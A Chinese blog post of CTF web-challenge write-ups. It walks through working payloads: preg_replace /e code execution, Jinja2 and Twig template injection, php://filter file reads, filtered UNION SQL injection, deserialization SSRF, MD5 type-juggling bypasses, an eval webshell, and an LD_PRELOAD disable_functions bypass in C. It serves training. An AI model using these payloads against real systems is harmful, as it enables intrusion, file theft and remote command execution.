题目讲解2

已于 2023-05-06 12:59:31 修改
阅读量462 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: php 开发语言
于 2023-05-05 14:58:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/aetlypdlg_ys/article/details/130506163

目录

ics-05 ics-06

06

05

PHP preg_replace() 函数

 Web_python_template_injection

file_include

fakebook

Easy MD5

RCE ME

[BJDCTF2020]Cookie is so stable

ics-05 ics-06

06

观察页面,找到漏洞点

爆破

2333

05

同样,先观察页面,找到漏洞点

 多了个page参数,随便试试,看能否下载或者显示文件内容不,直接看不能

我们试试php伪协议

page=php://filter/read=convert.base64-encode/resource=index.php

得到了内容,解码看看

关键部分

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

审计一下代码

要把自己的ip设置成127.0.0.1(可以直接在网页里将http头的X-Forwarded-For改为127.0.0.1)
还要给pat,rep,sub三个变量传值


PHP preg_replace() 函数

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。
参数说明:
$pattern: 要搜索的模式,可以是字符串或一个字符串数组。
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
$limit: 可选,对于每个模式用于每个 subject 字符串的最大可替换次数。 默认是-1(无限制)。
$count: 可选,为替换执行的次数

显然还是无法解题,这个时候就要了解 preg_replace()*函数存在一个安全问题 :/e 修正符使 preg_replace()函数将replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

比如我们本题构造?pat=/123/e&rep=phpinfo()&sub=123 就会触发phpinfo()的执行(此时的ip是127.0.0.1)

同样的道理,我们把phpinfo()改成其他的php代码就行了(都要用127.0.0.1这个ip)

?pat=/123/e&rep=system("ls")&sub=123

?pat=/123/e&rep=system("cd s3chahahaDir;ls -la")&sub=123

同理,继续
?pat=/123/e&rep=system("cd s3chahahaDir/flag;ls -la")&sub=123

?pat=/123/e&rep=system("cat s3chahahaDir/flag/flag.php")&sub=123

 Web_python_template_injection

ssti

{{[].__class__.__base__.__subclasses__()}}

这里我们用<class ‘site._Printer’>类型  可以进行命令执行

<type 'file'>类型    可以进行文件读取

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

读取

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

file_include

看上去是一个简单的文件包含

那就试试:?filename=php://filter/convert.base64-encode/resource=flag.php

发现不行,常规读取不行,肯定有过滤,用下面的方法

convert.iconv过滤器,[]中支持以下字符编码(* 表示该编码也可以在正则表达式中使用)

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
\\具体支持的编码可见php官方文档
\\https://www.php.net/manual/zh/mbstring.supported-encodings.php

?filename=php://filter/convert.iconv.utf-8.utf7/resource=flag.php

即把内容用UTF-8读取,用UTF-7输出

php://filter/convert.iconv.UTF-8*.UCS-4*/resource=flag.php

fakebook

先注册一下,blog必须存在才行,上图为我注册好后的界面
点进去发现网址:http://.../view.php?no=1
猜测有sql注入,试了试确实有,是整数型

order by 出来为4

union select 时发现被过滤了,用union/**/select绕过

?no=0 union/**/select 1,2,3,4 %23 => 发现2的位置可以注入

?no=0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()  =>users

?no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'  =>no,username,passwd,data

?no=0 union/**/select 1,group_concat(data),3,4 from users

看了看,只有data里的东西有用,如下:

O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:13:"www.baidu.com";}

里面的值为我们开始注册是输入的信息,它将这些信息进行了序列化并存储在数据库中,然后当我们查询的时候再反序列化显示在前端

robots.txt文件,我们访问看看
User-agent: *
Disallow: /user.php.bak

访问/user.php.bak后,下载了如下内容的文件

 $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

 通过这段代码可以知道,这个函数会读取blog,然后访问它,如果访问成功则会读取文件的信息,否则返回404,
所以我们可以通过反序列化来实现ssrf读取任意文件,构造我们想要的路径,然后为了绕过正则,不从注册登录的地方下手,
直接人为构造联合查询返回语句,data字段在第四个位置,如下:

<?php
class UserInfo{
    public $name="a";
    public $age="1";
    public $blog="file:///var/www/html/flag.php";
}
$data = new UserInfo();
echo serialize($data);
O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";s:1:"1";s:4:"blog";s:29:"file:///var/www/html/flag.php";}

?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";s:1:"1";s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

然后源码
点击iframe的src属性值即可获得flag

另一种方法:

在sql注入时查看当前用户
-1 union/**/select 1,user(),3,4
发现是root用户

mysql中的load_file函数,允许访问系统文件,并将内容以字符串形式返回,不过需要的权限很高,且函数参数要求文件的绝对路径有

直接:
-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4#
看源码

这个路径的话,在1'时就可猜出来了

Easy MD5

一个查询框,试试sql注入,不管我们怎么输都不行

去找提示

发现在响应头里,有个hint

涉及到md5(string,true)函数 

 

 可以简单测试一下

<?php

echo md5("aaa",TRUE);
echo("\n");
echo md5("aaa");

这里我们要做的就是,假如我们转递进去的内容经过这个md5加密之后的结果为 'or'--段内容并且在or后面加的这一段内容为true,在这种条件下就可以实现那个select * from 'admin' where password=md5($pass,true)sql语句的注入

并且这里还有一个知识点就是在mysql当中只要or后面的内容为数字+字符串也就是or 1……这样之后返回的值就为true

所以我们的目的就是去寻找一个字符串,使它经过MD5加密之后的值是'or'+数字……我们这里找了一个字符串就是:ffifdyop,我们可以看一下加密之后的结果

然后我们在输入框里输入ffifdyop之后继续,会跳出以下界面

看源码

$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){

传入两个不一样的参数值,但是在md5加密之后又要相等

这里就有了一个新的知识:==弱比较的时候会把两边的变量类型先转换成一样的再进行比较

而我们要做的就是让他们在转换之后的值相等,这里也有一个知识点就是0e在比较的时候会被当作科学计数法

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0

所以我们所做的就是传入一个字符串,使它经过md5加密的值为0e开头,从而再转换类型的时候会被当成是0,从而相等

这里有一些字符,在加密之后为0e开头:

QNKCDZO

240610708

s878926199a

s155964671a

s214587387a

所以我们这里就可以往a和b当中随便传两个上述的值就可以

?a=QNKCDZO&b=240610708

这里还有一种绕过的方法就是传入两个不同的数组变量,因为md5函数不能对数组变量进行加密,如果传进去的是数组变量,就会返回NULL,这个时候弱比较的值也是会相等的,这里要注意的是a[]和b[]的值也要是不相等的才行

?a[]=1&b[]=2

出现了新的

 <?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

这里的逻辑和上面的差不多,不过这里的比较改成了前面改成弱比较,后面是强比较,前面是弱比较,我们就不能使用之前那种使它的值为0e开头的那种方法,只能通过传递数组的方式来使他们的弱比较的值不相等,使它们经过md5之后的值又相等

param1[]=1&param2[]=2

RCE ME

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

 代码审计很简单
我们上传的payload中不能含有大小写字母和数字
我们可以使用 异或绕过 和 url编码取反 绕过绕过

先试试phpinfo

<?php
echo urlencode(~'phpinfo');
?>

payload:
?code=(~%8F%97%8F%96%91%99%90)();

可以访问 phpinfo 来查找被禁用的函数

disable_functions

发现基本能用的都给禁了

 不能直接使用eval 因为 eval并不是php函数 所以为我们无法通过变量函数的方法进行调用。
在这里,我们使用 assert 来构造,但由于php版本问题,我们并不能直接构造<?php assert($_POST['a']);>,我们需要调用eval
拼接为

code=assert(eval($_POST[cmd']));
或者是
code=$_=_GET;${$_}[_](${$_}[__]);&_=assert&__=eval($_POST['ma']);

用异或的方法经php的urlencode编码后得到的payload如下

code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${$_}[_](${$_}[__]);&_=assert&__=eval($_POST['ma']);
<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "\n";
$c='(eval($_POST[cmd]))';
$d=urlencode(~$c);
echo $d;
 ?>

?code=(~%9E%8C%8C%9A%8D%8B)

(%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6);

用蚁剑连接

由于 disable_functions的存在我们不能说直接读取flag,需要借助readflag来读取

获取flag

在获取flag的时候我们也有两种方法 一种直接借助蚁剑中的插件进行绕过,一种是

借助蚁剑插件

LD_PRELOAD
LD_PRELOAD指定的环境变量路径的共享库文件会在其他共享库前先一步调用,通过putenv即可设置该环境变量。
于是我们可以想到,编写一个会调用共享库文件函数的php程序,然后再编写一个含有同名函数的c语言程序(包含想执行的命令),并生成.so共享库文件然后通过putenv设置成LD_PRELOAD。于是在php程序运行的时候根据链接规则会调用我们编写的同名函数,这样就达到了劫持共享so的目的。

__ attribute __ ((constructor))
编写同名函数的方法自然是可行的(如geteuid),更通用的方法则是采用__attribute__((constructor)),它会在程序刚开始运行,共享库开始加载时即触发。

执行过程

首先是编写执行的c语言程序

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>

__attribute__((__constructor__)) void angel(){
    unsetenv("LD_PRELOAD");
    system("/readflag > /var/tmp/1.txt");
}

然后生成共享库文件1.so

gcc 1.c -fPIC -shared -o 1.so
 

编写对应php程序

<?php 
    putenv("LD_PRELOAD=/var/tmp/1.so");
    mail("","","","");
    var_dump(file_get_contents('/var/tmp/1.txt'));
?>

将php文件和so文件上传

上传到/var/tmp/下

通过include包含上传文件来加载共享库执行命令。
即想要上传的命令为

code=$_=_GET;${$_}[_](${$_}[__]);&_=assert&__=include('/var/tmp/1.php');
code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${$_}[_](${$_}[__]);&_=assert&__=include('/var/tmp/1.php');

[BJDCTF2020]Cookie is so stable

有首页,有flag页面,有hint页面

这里题目有提示,突破口是在cookie上面

那就抓包看看

在cookie加user={{7*'7'}}

返回49,表示是 Twig 模块 

 输入{{7*'7'}},返回7777777表示是 Jinja2 模块

这里注意要在PHPSESSID后user前加上;分隔开

由于是Twig注入,所以是有固定的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}//查看id
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

同样的方法,在cookie输入即可

CTF中PHP相关题目考点总结(二)
HBohan的博客
02-16 3147
介绍 本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。 PHP特性相关考点 一、 考点:php正则表达式的匹配模式差异。 例题: show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ #/i表示不区分大小写,/m表示多行匹配 i.
php 沙箱逃逸,PHP Smarty模版代码注入漏洞(CVE-2021-26120)
weixin_42317626的博客
03-28 1287
0x00漏洞概述CVE IDCVE-2021-26120时 间2021-02-26类 型代码注入等 级高危远程利用是影响范围PHP Smarty < 3.1.390x01漏洞详情Smarty是通过PHP开发模板引擎,它分开了PHP逻辑代码与外观(HTML页)以便于管理。近日,PHP Smarty被披露存在2PHP代码注入漏洞(CVE-2021-26120和CVE-2021-...
php代码审计题目总结
qq_45927819的博客
12-14 1908
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page))//判断.
WEB攻防-PHP特性-学以致用
luffysec的博客
01-11 4648
学习笔记-WEB攻防-PHP特性-学以致用
安恒暑期培训7-24wp
jojohacker的博客
09-27 467
BUU UPLOAD COURSE 1 发现了一段php代码 <?php highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 蚁剑扫一下在根目录下发现flag或者?file=/flag出现flag [BSidesCF 2020]Had a bad day 构造category=php://filter/convert.base64-enc
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1778
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
Java基础精品课05-数组录屏3.数组题目讲解2.mp4
05-20
Java基础精品课05-数组录屏3.数组题目讲解2.mp4
题目】考纲题目讲解-1669695.pdf
02-10
为了提供符合要求的回答,我将基于常见的考纲题目讲解类文档可能涉及的知识点进行假设性描述,假设文档中涉及的内容是关于数学、物理或者其他学科的考试题目讲解。 考纲题目讲解类文件通常包含以下知识点: 1. ...
各类题目讲解.rar
12-14
"各类题目讲解.rar"这个压缩包文件很可能包含了多种类型的编程题目及其解析,旨在帮助学习者深化理解,提高解决问题的能力。虽然没有具体的标签来指示文件的具体内容,但我们可以根据常见编程题目类型来探讨相关知识...
第十三届重庆市大学生程序设计大赛(拿金奖题目讲解部分题目)
05-14
本次分享将对其中部分题目进行详细讲解,以便理解题目背景、要求及解题思路。 首先,我们来关注Problem A,它涉及数组操作和位运算。题目描述了一个魔法玉盘,其中包含n个符文,每个符文代表一个不同的元素之力。要...
计算机网络疑问题目讲解优秀PPT.ppt
最新发布
08-04
计算机网络疑问题目讲解优秀PPT.ppt
ctfshow web入门 php特性
Sentiment的博客
04-11 5805
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
ctf_web入门审计题目
B_cecretary的博客
11-02 1263
记录个人学习过程的笔记
BUUCTF 23
qq_52431855的博客
02-05 549
知识点 jinja2 jinja2是Flask作者开发的一个模板系统,起初是仿django模板的一个模板引擎,为Flask提供模板支持,由于其灵活,快速和安全等优点被广泛使用。 Twig Twig是一款灵活、快速、安全的PHP模板引擎。 23-1[BJDCTF2020]Cookie is so stable 做题思路 首先打开靶机之后有个提示,对我没用 然后打开 flag ,问我什么名字,输入之后,显示的是输入的值,怀疑这里有注入 尝试一下,发现是模板注入输入 {{7*7}...
php模板注入漏洞,php的Smarty服务端模板注入,允许远程执行命令
weixin_33600376的博客
04-15 556
1、漏洞简介我在Unikrn的服务器上发现了一个漏洞:可以允许我执行‘file_get_contents ’函数,并且读取/etc/passwd文件的内容。2漏洞具体描述这个服务器看起来后台使用的是php的smarty模板,当在用户选项中的firstname, lastname或者nickname中输入一个恶意的payload,然后邀请一个用户来加入这个网站,然后就会导致代码被执行。Smarty...
攻防世界web进阶区Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1915
攻防世界web进阶区Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
模板注入】SSTI命令执行payload分析
4ut15m's blog
02-09 4015
SSTI基础 网上有关SSTI基础的文章很多,写的好的文章也有.下面给出一篇文章,本文不再细讲基础. <<从零学习flask模板注入>>@和蔼的杨小二 命令执行 要想执行命令便需要有可以执行命令的模块,一般来说很容易想到的模块便是os. 这里先看一个payload ''.__class__.__mro__[2].__subclasses__()[71].__in...
php模板注入漏洞,74CMS前台模板引擎注入漏洞漏洞复现
weixin_32000561的博客
04-15 616
74CMS 曝高危漏洞,攻击者只需注册会员账号,上传一份包含恶意内容的简历,即可控制网站服务器,进行任意操作。漏洞复现.jpg74CMS 又称 “骑士 CMS ”,是一项以 PHP 和 MySQL 为核心开发的一套免费并开源的专业人才网站系统。软件具有执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。74CMS 多应用于大型人才招聘网站,网站中通常会含有大量会员个人简历等私密信息,因此,该...
从 0 到 1:PHP 基础到就业教程指南(附教程资料)
闲余知道
07-31 448
从 0 到 1:PHP 基础到就业教程指南(附教程资料)
电子大赛题目方案深度解析与历年讲解回顾
2. 历届题目的设置特点: 历届电子大赛的题目往往会设置一定的难度等级,题目类型可以是理论分析、实物设计、软件编程、系统集成、故障诊断等。题目要求可能包括对某一新技术的探索、对已有技术的改进、或者完全自由...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值